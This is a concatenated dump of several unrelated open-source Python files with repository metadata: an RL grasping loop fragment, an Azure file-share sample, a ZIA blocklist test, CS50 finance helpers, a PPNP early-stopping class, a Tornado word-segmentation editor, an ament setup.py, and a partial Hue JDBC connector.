# print(env.grasp())
# time.sleep(100)
# env.open_griper()
# print('init state', state)
for i in range(200):
k += 1
# print(state)
# time.sleep(2)
action = gt.select_action_cnn(frame, pos)
# print('action : ', action)
reward, next_state, done, next_frame, next_pos = env.step(action)
episode_reward += reward
gt.buffer.add((state, action, next_state, reward, done, frame, next_frame, pos, next_pos))
# print('reward : ', reward)
if k > 32 or done == 1:
k = 0
gt.learn()
if done == 1:
break
state = next_state
frame = next_frame
pos = next_pos
gt.buffer.clear()
if t % 10 == 0:
print('in epoch ' + str(t) + ' episode reward : ', episode_reward)
if t % 1000 == 999:
gt.save_model('policy_cnn_only_grasp_' + str(t) + '.para', 'value_cnn_only_grasp_' + str(t) + '.para')
info = {'episode reward': episode_reward}
for tag, value in info.items():
log.scalar_summary(tag, value, step=steps)
| 30.571429 | 110 | 0.600801 |
87679ab307bdc53327b041b9b9f59e4225d6ade7 | 3,048 | py | Python | samples/storage/manage_file_share.py | leigharubin/azure-samples-python-management | ed640755f5362e309ba66af22a3d0c67b008c708 | [
"MIT"
] | 47 | 2020-05-29T18:25:57.000Z | 2022-03-30T06:04:56.000Z | samples/storage/manage_file_share.py | leigharubin/azure-samples-python-management | ed640755f5362e309ba66af22a3d0c67b008c708 | [
"MIT"
] | 27 | 2020-05-13T06:37:24.000Z | 2022-03-01T07:58:34.000Z | samples/storage/manage_file_share.py | leigharubin/azure-samples-python-management | ed640755f5362e309ba66af22a3d0c67b008c708 | [
"MIT"
] | 67 | 2020-05-09T06:09:19.000Z | 2022-03-22T23:18:06.000Z | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import os
from azure.identity import DefaultAzureCredential
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.resource import ResourceManagementClient
def main():
SUBSCRIPTION_ID = os.environ.get("SUBSCRIPTION_ID", None)
GROUP_NAME = "testgroupx"
STORAGE_ACCOUNT = "storageaccountxxy"
FILE_SHARE = "filesharexxyyzz"
# Create client
# # For other authentication approaches, please see: https://pypi.org/project/azure-identity/
resource_client = ResourceManagementClient(
credential=DefaultAzureCredential(),
subscription_id=SUBSCRIPTION_ID
)
storage_client = StorageManagementClient(
credential=DefaultAzureCredential(),
subscription_id=SUBSCRIPTION_ID
)
# Create resource group
resource_client.resource_groups.create_or_update(
GROUP_NAME,
{"location": "eastus"}
)
# - init depended resources -
# Create storage account
storage_client.storage_accounts.begin_create(
GROUP_NAME,
STORAGE_ACCOUNT,
{
"sku": {
"name": "Standard_GRS"
},
"kind": "StorageV2",
"location": "eastus",
"encryption": {
"services": {
"file": {
"key_type": "Account",
"enabled": True
},
"blob": {
"key_type": "Account",
"enabled": True
}
},
"key_source": "Microsoft.Storage"
},
"tags": {
"key1": "value1",
"key2": "value2"
}
}
).result()
# - end -
# Create file share
file_share = storage_client.file_shares.create(
GROUP_NAME,
STORAGE_ACCOUNT,
FILE_SHARE,
{}
)
print("Create file share:\n{}".format(file_share))
# Get file share
file_share = storage_client.file_shares.get(
GROUP_NAME,
STORAGE_ACCOUNT,
FILE_SHARE
)
print("Get file share:\n{}".format(file_share))
# Update file share
file_share = storage_client.file_shares.update(
GROUP_NAME,
STORAGE_ACCOUNT,
FILE_SHARE,
{
"properties": {
"metadata": {
"type": "image"
}
}
}
)
print("Update file share:\n{}".format(file_share))
# Delete file share
file_share = storage_client.file_shares.delete(
GROUP_NAME,
STORAGE_ACCOUNT,
FILE_SHARE
)
print("Delete file share.\n")
# Delete Group
resource_client.resource_groups.begin_delete(
GROUP_NAME
).result()
if __name__ == "__main__":
main()
| 26.051282 | 97 | 0.549869 |
0ae147dd79a39e93886981edd8edb26cc78a5fe2 | 3,405 | py | Python | fn_zia/tests/test_funct_zia_get_blocklist.py | nickpartner-goahead/resilient-community-apps | 097c0dbefddbd221b31149d82af9809420498134 | [
"MIT"
] | 65 | 2017-12-04T13:58:32.000Z | 2022-03-24T18:33:17.000Z | fn_zia/tests/test_funct_zia_get_blocklist.py | nickpartner-goahead/resilient-community-apps | 097c0dbefddbd221b31149d82af9809420498134 | [
"MIT"
] | 48 | 2018-03-02T19:17:14.000Z | 2022-03-09T22:00:38.000Z | fn_zia/tests/test_funct_zia_get_blocklist.py | nickpartner-goahead/resilient-community-apps | 097c0dbefddbd221b31149d82af9809420498134 | [
"MIT"
] | 95 | 2018-01-11T16:23:39.000Z | 2022-03-21T11:34:29.000Z | # -*- coding: utf-8 -*-
"""Tests using pytest_resilient_circuits"""
import pytest
from mock import patch
from resilient_circuits.util import get_config_data, get_function_definition
from resilient_circuits import SubmitTestFunction, FunctionResult
from .mock_artifacts import *
PACKAGE_NAME = "fn_zia"
FUNCTION_NAME = "funct_zia_get_blocklist"
# Read the mock configuration-data section from the package
config_data = get_mock_config()
# Provide a simulation of the Resilient REST API (uncomment to connect to a real appliance)
resilient_mock = "pytest_resilient_circuits.BasicResilientMock"
def assert_keys_in(json_obj, *keys):
for key in keys:
assert key in json_obj
def call_funct_zia_get_blocklist_function(circuits, function_params, timeout=5):
# Create the submitTestFunction event
evt = SubmitTestFunction("funct_zia_get_blocklist", function_params)
# Fire a message to the function
circuits.manager.fire(evt)
# circuits will fire an "exception" event if an exception is raised in the FunctionComponent
# return this exception if it is raised
exception_event = circuits.watcher.wait("exception", parent=None, timeout=timeout)
if exception_event is not False:
exception = exception_event.args[1]
raise exception
# else return the FunctionComponent's results
else:
event = circuits.watcher.wait("funct_zia_get_blocklist_result", parent=evt, timeout=timeout)
assert event
assert isinstance(event.kwargs["result"], FunctionResult)
pytest.wait_for(event, "complete", True)
return event.kwargs["result"].value
class TestFunctZiaGetBlocklist:
""" Tests for the funct_zia_get_blocklist function"""
def test_function_definition(self):
""" Test that the package provides customization_data that defines the function """
func = get_function_definition(PACKAGE_NAME, FUNCTION_NAME)
assert func is not None
mock_inputs_1 = {
"zia_url_filter": None
}
expected_results_1 = {"blacklistUrls": ["badhost.com", "192.168.12.2"], "url_counts": {"filtered": 2, "total": 2}}
mock_inputs_2 = {
"zia_url_filter": ".*"
}
expected_results_2 = {"blacklistUrls": ["badhost.com", "192.168.12.2"], "url_counts": {"filtered": 2, "total": 2}}
mock_inputs_3 = {
"zia_url_filter": "badhost"
}
expected_results_3 = {"blacklistUrls": ["badhost.com"], "url_counts": {"filtered": 1, "total": 2}}
mock_inputs_4 = {
"zia_url_filter": "goodhost"
}
expected_results_4 = {"blacklistUrls": [], "url_counts": {"filtered": 0, "total": 2}}
@patch("fn_zia.components.funct_zia_get_blocklist.ZiaClient", side_effect=mocked_zia_client)
@pytest.mark.parametrize("mock_inputs, expected_results", [
(mock_inputs_1, expected_results_1),
(mock_inputs_2, expected_results_2),
(mock_inputs_3, expected_results_3),
(mock_inputs_4, expected_results_4)
])
def test_success(self, mock_cli, circuits_app, mock_inputs, expected_results):
""" Test calling with sample values for the parameters """
keys = ["content", "inputs", "metrics", "raw", "reason", "success", "version"]
results = call_funct_zia_get_blocklist_function(circuits_app, mock_inputs)
assert_keys_in(results, *keys)
assert(expected_results == results["content"])
| 35.842105 | 118 | 0.70837 |
32087a64c819100593a4b33552703228b12dac04 | 2,179 | py | Python | 2020-S2/psets/2018/pset7/finance/helpers.py | BoomlabsInc/BCSF | 5bde1a113ac6fa7bf45dcf9bea9ec32f78b8e129 | [
"MIT"
] | 2 | 2020-11-20T18:47:29.000Z | 2022-03-19T12:52:44.000Z | 2020-S2/psets/2018/pset7/finance/helpers.py | DLozanoNavas/BCSF_Repo | d2776837c772b29008817cddf7eea241b0813809 | [
"MIT"
] | null | null | null | 2020-S2/psets/2018/pset7/finance/helpers.py | DLozanoNavas/BCSF_Repo | d2776837c772b29008817cddf7eea241b0813809 | [
"MIT"
] | null | null | null | import csv
import os
import urllib.request
from flask import redirect, render_template, request, session
from functools import wraps
def apology(message, code=400):
"""Render message as an apology to user."""
def escape(s):
"""
Escape special characters.
https://github.com/jacebrowning/memegen#special-characters
"""
for old, new in [("-", "--"), (" ", "-"), ("_", "__"), ("?", "~q"),
("%", "~p"), ("#", "~h"), ("/", "~s"), ("\"", "''")]:
s = s.replace(old, new)
return s
return render_template("apology.html", top=code, bottom=escape(message)), code
def login_required(f):
"""
Decorate routes to require login.
http://flask.pocoo.org/docs/0.12/patterns/viewdecorators/
"""
@wraps(f)
def decorated_function(*args, **kwargs):
if session.get("user_id") is None:
return redirect("/login")
return f(*args, **kwargs)
return decorated_function
def lookup(symbol):
"""Look up quote for symbol."""
# Reject symbol if it starts with caret
if symbol.startswith("^"):
return None
# Reject symbol if it contains comma
if "," in symbol:
return None
# Query Alpha Vantage for quote
# https://www.alphavantage.co/documentation/
try:
# GET CSV
url = f"https://www.alphavantage.co/query?apikey={os.getenv('API_KEY')}&datatype=csv&function=TIME_SERIES_INTRADAY&interval=1min&symbol={symbol}"
webpage = urllib.request.urlopen(url)
# Parse CSV
datareader = csv.reader(webpage.read().decode("utf-8").splitlines())
# Ignore first row
next(datareader)
# Parse second row
row = next(datareader)
# Ensure stock exists
try:
price = float(row[4])
except:
return None
# Return stock's name (as a str), price (as a float), and (uppercased) symbol (as a str)
return {
"price": price,
"symbol": symbol.upper()
}
except:
return None
def usd(value):
"""Format value as USD."""
return f"${value:,.2f}"
| 25.635294 | 153 | 0.568609 |
29b134038238ae46f78b65e04934e74b81f6cf7b | 2,955 | py | Python | ppnp/tensorflow/earlystopping.py | achalagarwal/ppnp | 3c2e3d5fdeab175410107da07b166066923e6856 | [
"MIT"
] | 256 | 2019-02-20T13:57:13.000Z | 2022-02-28T15:44:25.000Z | ppnp/tensorflow/earlystopping.py | ibrahim85/Graph-Neural-Networks-meet-Personalized-PageRan | b408669b0a13797c84f5b6f0fab99fe3818abb92 | [
"MIT"
] | 15 | 2019-03-01T17:30:05.000Z | 2022-02-08T11:26:29.000Z | ppnp/tensorflow/earlystopping.py | ibrahim85/Graph-Neural-Networks-meet-Personalized-PageRan | b408669b0a13797c84f5b6f0fab99fe3818abb92 | [
"MIT"
] | 51 | 2019-02-27T08:25:30.000Z | 2022-02-14T09:57:35.000Z | from typing import List
import copy
import operator
from enum import Enum, auto
import numpy as np
from .model import Model
class StopVariable(Enum):
LOSS = auto()
ACCURACY = auto()
F1_SCORE = auto()
NONE = auto()
class Best(Enum):
RANKED = auto()
ALL = auto()
stopping_args = dict(
stop_varnames=[StopVariable.ACCURACY, StopVariable.LOSS],
patience=100, max_steps=10000, remember=Best.RANKED)
class EarlyStopping:
def __init__(
self, model: Model, stop_varnames: List[StopVariable],
patience: int = 10, max_steps: int = 200, remember: Best = Best.ALL):
self.model = model
self.comp_ops = []
self.stop_vars = []
self.best_vals = []
for stop_varname in stop_varnames:
if stop_varname is StopVariable.LOSS:
self.stop_vars.append(model.loss)
self.comp_ops.append(operator.le)
self.best_vals.append(np.inf)
elif stop_varname is StopVariable.ACCURACY:
self.stop_vars.append(model.accuracy)
self.comp_ops.append(operator.ge)
self.best_vals.append(-np.inf)
elif stop_varname is StopVariable.F1_SCORE:
self.stop_vars.append(model.f1_score)
self.comp_ops.append(operator.ge)
self.best_vals.append(-np.inf)
self.remember = remember
self.remembered_vals = copy.copy(self.best_vals)
self.max_patience = patience
self.patience = self.max_patience
self.max_steps = max_steps
self.best_step = None
self.best_trainables = None
def check(self, values: List[np.floating], step: int) -> bool:
checks = [self.comp_ops[i](val, self.best_vals[i])
for i, val in enumerate(values)]
if any(checks):
self.best_vals = np.choose(checks, [self.best_vals, values])
self.patience = self.max_patience
comp_remembered = [
self.comp_ops[i](val, self.remembered_vals[i])
for i, val in enumerate(values)]
if self.remember is Best.ALL:
if all(comp_remembered):
self.best_step = step
self.remembered_vals = copy.copy(values)
self.best_trainables = self.model.get_vars()
elif self.remember is Best.RANKED:
for i, comp in enumerate(comp_remembered):
if comp:
if not(self.remembered_vals[i] == values[i]):
self.best_step = step
self.remembered_vals = copy.copy(values)
self.best_trainables = self.model.get_vars()
break
else:
break
else:
self.patience -= 1
return self.patience == 0
| 35.178571 | 81 | 0.56176 |
5bf078f95e08bd1eb2802af9113b11d8cd3cdab1 | 16,999 | py | Python | main.py | bobeina/wordseg_results_editor | 87de99b3e8603b5048598fea84afacf697d513a4 | [
"MIT"
] | 2 | 2017-05-22T08:36:08.000Z | 2017-05-22T09:58:31.000Z | main.py | bobeina/wordseg_results_editor | 87de99b3e8603b5048598fea84afacf697d513a4 | [
"MIT"
] | null | null | null | main.py | bobeina/wordseg_results_editor | 87de99b3e8603b5048598fea84afacf697d513a4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#
# This file is derivied from the Tornado tutorial
# https://github.com/tornadoweb/tornado/tree/stable/demos/blog and has
# been modified by Yang D.Y. <minvacai@sina.com> for:
# TextListHandler / AboutHandler/ RawTextHandler/ WordSegHandler and
# relative parts such as template files.
#
#
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import bcrypt
import concurrent.futures
import pymongo
import markdown
import os.path
import re
import tornado.escape
from tornado import gen
import tornado.httpserver
import tornado.ioloop
import tornado.options
import tornado.web
import unicodedata
from tornado.options import define, options
import datetime
from bson.objectid import ObjectId
import json
import sys
sys.path.append('./')
define("port", default=9999, help="run on the given port", type=int)
# A thread pool to be used for password hashing with bcrypt.
executor = concurrent.futures.ThreadPoolExecutor(2)
class Struct:
def __init__(self, **entries):
self.__dict__.update(entries)
class Application(tornado.web.Application):
def __init__(self):
handlers = [
(r"/", HomeHandler),
(r"/archive", ArchiveHandler),
(r"/feed", FeedHandler),
(r"/entry/([^/]+)", EntryHandler),
(r"/compose", ComposeHandler),
(r"/auth/create", AuthCreateHandler),
(r"/auth/login", AuthLoginHandler),
(r"/auth/logout", AuthLogoutHandler),
(r"/about", AboutHandler),
(r"/texts", TextListHandler),
(r"/raw/([^/]+)", RawTextHandler),
(r"/ws/([^/]+)", WordSegHandler),
(r"/export", ExportHandler),
]
settings = dict(
blog_title=u"分词校对",
template_path=os.path.join(os.path.dirname(__file__), "templates"),
static_path=os.path.join(os.path.dirname(__file__), "static"),
ui_modules={"Entry": EntryModule},
xsrf_cookies=True,
cookie_secret="__TODO:_GENERATE_YOUR_OWN_RANDOM_VALUE_HERE__EEEEEEEEEER",
login_url="/auth/login",
debug=True
)
super(Application, self).__init__(handlers, **settings)
client = pymongo.MongoClient("mongodb://localhost")
self.db = client.rawtext
class BaseHandler(tornado.web.RequestHandler):
@property
def db(self):
return self.application.db
def get_current_user(self):
user_id = self.get_secure_cookie("rawtext_user")
if not user_id:
return None
usernm = "".join([chr(x) for x in user_id])
user = self.application.db.authors.find_one({'name': usernm})
return user
def any_author_exists(self):
one = self.db.authors.find_one()
return bool(one)
class HomeHandler(BaseHandler):
def get(self):
entries =[]
cursor = self.db.entries.find().limit(5)
for entry in cursor:
entries.append(entry)
self.render("home.html", entries=entries)
class EntryHandler(BaseHandler):
def get(self, slug):
entry = self.db.entries.find_one({"slug": slug})
if not entry: raise tornado.web.HTTPError(404)
self.render("entry.html", entry=entry)
class ArchiveHandler(BaseHandler):
def get(self):
cursor = self.db.entries.find().sort('published', -1)
entries = [entry for entry in cursor]
self.render("archive.html", entries=entries)
class FeedHandler(BaseHandler):
def get(self):
entries = []
cursor = self.db.entries.find().sort('published', -1).limit(10)
for entry in cursor:
entries.append(entry)
self.set_header("Content-Type", "application/atom+xml")
self.render("feed.xml", entries=entries)
class ComposeHandler(BaseHandler):
@tornado.web.authenticated
def get(self):
article_id = self.get_argument("id", None)
entry = None
if article_id:
entry = self.db.entries.find_one({"_id": ObjectId(article_id)})
self.render("compose.html", entry=entry)
@tornado.web.authenticated
def post(self):
id = self.get_argument("_id", None)
title = self.get_argument("title")
text = self.get_argument("markdown")
html = markdown.markdown(text)
# if user_name:
if id:
entry = self.db.entries.find_one({"_id": ObjectId(id)})
if not entry: raise tornado.web.HTTPError(404)
slug = entry["slug"]
doc = {
"title": title,
"markdown": text,
"html": html,
"last_modify":datetime.datetime.utcnow()
}
self.db.entries.update_one({"_id": ObjectId(id)}, {"$set": doc})
else:
slug = str(unicodedata.normalize("NFKD", title).encode(
"ascii", "ignore"))
slug = re.sub(r"[^\w]+", " ", str(slug))
slug = "-".join(slug.lower().strip().split())
if not slug: slug = "entry"
while True:
e = self.db.entries.find_one({"slug": slug})
if not e: break
slug += "-2"
doc = {
"author_id": str(self.current_user["_id"]),
"author_name": self.current_user["name"],
"title": title,
"slug": slug,
"markdown": text,
"html": html,
"published": datetime.datetime.utcnow()
}
self.db.entries.insert_one(doc)
self.redirect("/entry/" + slug)
class AuthCreateHandler(BaseHandler):
def get(self):
self.render("create_author.html")
@gen.coroutine
def post(self):
if self.any_author_exists():
raise tornado.web.HTTPError(400, "author already created")
hashed_password = yield executor.submit(
bcrypt.hashpw, tornado.escape.utf8(self.get_argument("password")),
bcrypt.gensalt())
author = {
"email": self.get_argument("email"),
"name": self.get_argument("name"),
"hashed_password": hashed_password
}
try:
result = self.db.authors.insert_one(author)
except Exception as e:
raise tornado.web.HTTPError(404)
self.set_secure_cookie("rawtext_user", author["name"])
self.redirect(self.get_argument("next", "/"))
class AuthLoginHandler(BaseHandler):
def get(self):
# If there are no authors, redirect to the account creation page.
if not self.any_author_exists():
self.redirect("/auth/create")
else:
self.render("login.html", error=None)
@gen.coroutine
def post(self):
author = self.db.authors.find_one({'email': self.get_argument("email")})
if not author:
self.render("login.html", error="email not found")
return
hashed_password = yield executor.submit(
bcrypt.hashpw, tornado.escape.utf8(self.get_argument("password")),
tornado.escape.utf8(author["hashed_password"]))
if hashed_password == author["hashed_password"]:
self.set_secure_cookie("rawtext_user", author["name"])
self.redirect(self.get_argument("next", "/"))
else:
self.render("login.html", error="incorrect password")
class AuthLogoutHandler(BaseHandler):
def get(self):
self.clear_cookie("rawtext_user")
self.redirect(self.get_argument("next", "/"))
class EntryModule(tornado.web.UIModule):
def render(self, entry):
return self.render_string("modules/entry.html", entry=entry)
class TextListHandler(BaseHandler):
@tornado.web.authenticated
def get(self):
page = self.get_argument("page", None)
num = self.get_argument("num", None)
status = self.get_argument("type", None)
statuslst = ['raw', 'cut', 'check']
query = {}
if status:
# 卧槽,忘记为什么要这样写了
if status in '123':
query = {'status':statuslst[int(type)]}
if not num:
num = 20
if not page:
page = 0
else:
page = int(page)
cursor = self.db.text.find(
query,
{
'_id': 1,
'batch': 1,
'summary': 1,
'info': 1,
'status': 1,
'creator': 1,
'create_time': 1
}
).sort("create_time", -1).skip(page * num).limit(num)
raws = []
status_table = ["已删除", "未处理", "已分词", "已校对"]
for raw in cursor:
raw["_id"] = str(raw["_id"])
raw["info"]["source"] = raw["info"]["source"][:10]
raw["info"]["author"] = raw["info"]["author"][:10]
raw["info"]["url"] = raw["info"]["url"][:10]
raw["status"] = status_table[raw["status"]]
raw["summary"] = raw["summary"][:10] + "..."
#raw["creator"] = self.get_current_user() #str(raw["creator"])
raws.append(raw)
# print("raws: ", raws)
self.render("textlist.html", raws=raws, page=page)
class AboutHandler(BaseHandler):
@tornado.web.authenticated
def get(self):
text = {
'title': "一些说明",
'author': "redsky",
'content': [
"写得很乱,应该用Backbone的,大意了!"
],
'date': '2017/5/22 12:18'
}
self.render("about.html", texts=text)
class RawTextHandler(BaseHandler):
"""
add/modify raw text; cut/check not here.
text status:
"""
@tornado.web.authenticated
def get(self, id):
text = []
# id = self.get_argument("id", None)
if id:
text = self.db.text.find_one({"_id": ObjectId(id)})
text["_id"] = str(text["_id"])
self.render("text.html", text=text, msg="")
@tornado.web.authenticated
def post(self):
id = self.get_argument("_id", None)
whitelst = [
'batch',
'raw'
]
infolst = [
'source',
'author',
'field',
'time'
]
error_flag = False
doc = {'info': {}}
for item in whitelst:
doc[item] = self.get_argument(item, None)
if not doc[item]:
error_flag = True
break
for item in infolst:
doc["info"][item] = self.get_argument(item)
if not doc["info"][item]:
error_flag = True
break
if error_flag:
self.render("text.html", error="请填写所有项!")
return
doc['info']['field'] = doc['info']['field'].split(',')
source_url = self.get_argument('url', None)
if source_url:
doc["info"]['url'] = source_url
doc['summary'] = doc['raw'][:40] + "..."
creator_info = self.get_current_user()
creator = {
'name': creator_info['name'],
'email': creator_info['email']
}
doc['creator'] = creator
print("id: ", id)
if id:
doc['modify_time'] = datetime.datetime.utcnow()
self.db.text.update_one({"_id": ObjectId(id)}, {"$set": doc})
else:
doc['create_time'] = datetime.datetime.utcnow()
doc['status'] = 1
self.db.text.insert_one(doc)
self.redirect("/texts")
class WordSegHandler(BaseHandler):
"""
add/modify raw text; cut/check not here.
text status:
"""
@tornado.web.authenticated
def get(self, id):
text = []
# id = self.get_argument("id", None)
if id:
text = self.db.text.find_one(
{"_id": ObjectId(id)},
{
"_id": 1,
"raw": 1,
"proofreaded": 1,
"cut": 1
}
)
text["_id"] = str(text["_id"])
else:
self.redirect("/texts/")
# self.render("wslist.html", result=text["proofreaded"], id=text["_id"])
return
if "proofreaded" in text: #text["proofreaded"]:
data = text["proofreaded"]
else:
data = text["cut"]
self.render(
"wordseg.html",
result=data,
raw=text["raw"],
id=id,
error=""
)
@tornado.web.authenticated
def post(self, id):
# id = self.get_argument("_id", None)
data = self.get_argument("data", None)
proofreaded = self.get_argument("proofreaded_ok", None)
# json to dict
if not data:
return
try:
wordlst = json.loads(data)
except Exception as e:
return
# find document from MongoDB by id, verify wether data string equals to raw or cut
text = self.db.text.find_one(
{
"_id": ObjectId(id)
},
{
"_id": 1,
"raw": 1,
"cut": 1
}
)
if not text:
self.redirect("/texts/")
return
if "cut" not in text:
self.redirect("/texts/")
return
# compare data
input_str = "".join(wordlst)
orgin_str = "".join(text["cut"])
if input_str != orgin_str:
self.render(
"wordseg.html",
result=text["cut"],
id=id,
raw="",
error="与原始数据不吻合!"
)
return
# update document in MongoDB by id
values = {
"$set":
{
"proofreaded": wordlst,
}
}
if proofreaded:
values["$set"]["status"] = 3
rvalue = self.db.text.update_one(
{
"_id": ObjectId(id)
},
values
)
if rvalue:
self.render(
"wordseg.html",
result=wordlst,
id=id,
raw=text["raw"],
error=""
)
else:
self.render(
"wordseg.html",
result=[],
id=id,
raw="",
error="更新数据失败!"
)
class ExportHandler(BaseHandler):
"""
select data and export
"""
@tornado.web.authenticated
def get(self):
self.render("export.html")
@tornado.web.authenticated
def post(self):
batch_list = self.get_argument("batch")
if not batch_list:
self.render("export.html", error=1)
return
query = {"status": 3}
if batch_list != "ALL":
try:
batch = [x.strip() for x in batch_list.split(",")]
query["batch"] = {"$in": batch}
except Exception as e:
self.render("export.html", error="参数有误")
return
filter = {"_id":0, "proofreaded": 1}
cursor = self.db.text.find( query, filter )
lst = []
for ele in cursor:
for word in ele["proofreaded"]:
length = len(word)
if length == 1:
lst.append(word[0] + '/s')
else:
lst.append(word[0] + '/b')
for c in word[1:-1]:
lst.append(c + '/m')
lst.append(word[-1] + '/e')
lst.append('\n/s')
train = ' '.join(lst)
filenm = 'train_{0}'.format(datetime.datetime.now().strftime("%Y%m%d_%H%M%S"))
self.set_header('Content-Type', 'application/octet-stream')
self.set_header('Content-Disposition', 'attachment; filename=' + filenm)
buf_size = 4096
count = 0
while True:
data = train[count:count+buf_size]
self.write(data)
if count + buf_size > len(train):
break
count += buf_size
self.finish()
def main():
tornado.options.parse_command_line()
http_server = tornado.httpserver.HTTPServer(Application())
http_server.listen(options.port)
tornado.ioloop.IOLoop.current().start()
if __name__ == "__main__":
main()
| 30.684116 | 90 | 0.526855 |
7739b83899057b7473e77b75e1e35dd2a2e24bb8 | 1,476 | py | Python | ament_pep257/setup.py | ExcessBullseye/ament_lint | 100683ca73de2ccf377937e64955d5b79c43721e | [
"Apache-2.0"
] | null | null | null | ament_pep257/setup.py | ExcessBullseye/ament_lint | 100683ca73de2ccf377937e64955d5b79c43721e | [
"Apache-2.0"
] | null | null | null | ament_pep257/setup.py | ExcessBullseye/ament_lint | 100683ca73de2ccf377937e64955d5b79c43721e | [
"Apache-2.0"
] | null | null | null | from setuptools import find_packages
from setuptools import setup
package_name = 'ament_pep257'
setup(
name=package_name,
version='0.10.6',
packages=find_packages(exclude=['test']),
data_files=[
('share/' + package_name, ['package.xml']),
('share/ament_index/resource_index/packages',
['resource/' + package_name]),
],
install_requires=['setuptools'],
package_data={'': [
'configuration/ament_pep257.ini',
]},
zip_safe=True,
author='Dirk Thomas',
author_email='dthomas@osrfoundation.org',
maintainer='Audrow Nash',
maintainer_email='audrow@openrobotics.org',
url='https://github.com/ament/ament_lint',
download_url='https://github.com/ament/ament_lint/releases',
keywords=['ROS'],
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Topic :: Software Development',
],
description='Check Python code style using pep257.',
long_description="""\
The ability to check code against the docstring conventions in PEP 257
and generate xUnit test result files.""",
license='Apache License, Version 2.0',
tests_require=['pytest'],
entry_points={
'console_scripts': [
'ament_pep257 = ament_pep257.main:main',
],
'pytest11': [
'ament_pep257 = ament_pep257.pytest_marker',
],
},
)
| 30.75 | 70 | 0.639566 |
5244fb5b22b7e7dd44890749467daa379c964477 | 8,142 | py | Python | desktop/libs/notebook/src/notebook/connectors/jdbc.py | e11it/hue-1 | 436704c40b5fa6ffd30bd972bf50ffeec738d091 | [
"Apache-2.0"
] | null | null | null | desktop/libs/notebook/src/notebook/connectors/jdbc.py | e11it/hue-1 | 436704c40b5fa6ffd30bd972bf50ffeec738d091 | [
"Apache-2.0"
] | null | null | null | desktop/libs/notebook/src/notebook/connectors/jdbc.py | e11it/hue-1 | 436704c40b5fa6ffd30bd972bf50ffeec738d091 | [
"Apache-2.0"
] | 1 | 2020-04-02T04:50:26.000Z | 2020-04-02T04:50:26.000Z | #!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from builtins import object
import logging
import sys
from django.utils.translation import ugettext as _
from beeswax import data_export
from desktop.lib.i18n import force_unicode, smart_str
from librdbms.jdbc import Jdbc, query_and_fetch
from notebook.connectors.base import Api, QueryError, AuthenticationRequired, _get_snippet_name
LOG = logging.getLogger(__name__)
# Cache one JDBC connection by user for not saving user credentials
API_CACHE = {}
def query_error_handler(func):
def decorator(*args, **kwargs):
try:
return func(*args, **kwargs)
except AuthenticationRequired as e:
raise e
except Exception as e:
message = force_unicode(smart_str(e))
if 'error occurred while trying to connect to the Java server' in message:
raise QueryError, _('%s: is the DB Proxy server running?') % message, sys.exc_info()[2]
elif 'Access denied' in message:
raise AuthenticationRequired, '', sys.exc_info()[2]
else:
raise QueryError, message, sys.exc_info()[2]
return decorator
class JdbcApi(Api):
def __init__(self, user, interpreter=None):
global API_CACHE
Api.__init__(self, user, interpreter=interpreter)
self.db = None
self.options = interpreter['options']
if self.cache_key in API_CACHE:
self.db = API_CACHE[self.cache_key]
elif 'password' in self.options:
username = self.options.get('user') or user.username
impersonation_property = self.options.get('impersonation_property')
self.db = API_CACHE[self.cache_key] = Jdbc(self.options['driver'], self.options['url'], username, self.options['password'], impersonation_property=impersonation_property, impersonation_user=user.username)
def create_session(self, lang=None, properties=None):
global API_CACHE
props = super(JdbcApi, self).create_session(lang, properties)
properties = dict([(p['name'], p['value']) for p in properties]) if properties is not None else {}
props['properties'] = {} # We don't store passwords
if self.db is None or not self.db.test_connection(throw_exception='password' not in properties):
if 'password' in properties:
user = properties.get('user') or self.options.get('user')
props['properties'] = {'user': user}
self.db = API_CACHE[self.cache_key] = Jdbc(self.options['driver'], self.options['url'], user, properties.pop('password'))
self.db.test_connection(throw_exception=True)
if self.db is None:
raise AuthenticationRequired()
return props
@query_error_handler
def execute(self, notebook, snippet):
if self.db is None:
raise AuthenticationRequired()
data, description = query_and_fetch(self.db, snippet['statement'], 1000)
has_result_set = data is not None
return {
'sync': True,
'has_result_set': has_result_set,
'result': {
'has_more': False,
'data': data if has_result_set else [],
'meta': [{
'name': col[0],
'type': col[1],
'comment': ''
} for col in description] if has_result_set else [],
'type': 'table'
}
}
@query_error_handler
def check_status(self, notebook, snippet):
return {'status': 'available'}
def _fetch_result(self, cursor):
return {}
@query_error_handler
def fetch_result_metadata(self):
pass
@query_error_handler
def cancel(self, notebook, snippet):
return {'status': 0}
@query_error_handler
def close_statement(self, notebook, snippet):
return {'status': -1}
@query_error_handler
def autocomplete(self, snippet, database=None, table=None, column=None, nested=None):
if self.db is None:
raise AuthenticationRequired()
assist = self._createAssist(self.db)
response = {'status': -1}
if database is None:
response['databases'] = assist.get_databases()
elif table is None:
tables = assist.get_tables_full(database)
response['tables'] = [table['name'] for table in tables]
response['tables_meta'] = tables
else:
columns = assist.get_columns_full(database, table)
response['columns'] = [col['name'] for col in columns]
response['extended_columns'] = columns
response['status'] = 0
return response
@query_error_handler
def get_sample_data(self, snippet, database=None, table=None, column=None, is_async=False, operation=None):
if self.db is None:
raise AuthenticationRequired()
assist = self._createAssist(self.db)
response = {'status': -1, 'result': {}}
sample_data, description = assist.get_sample_data(database, table, column)
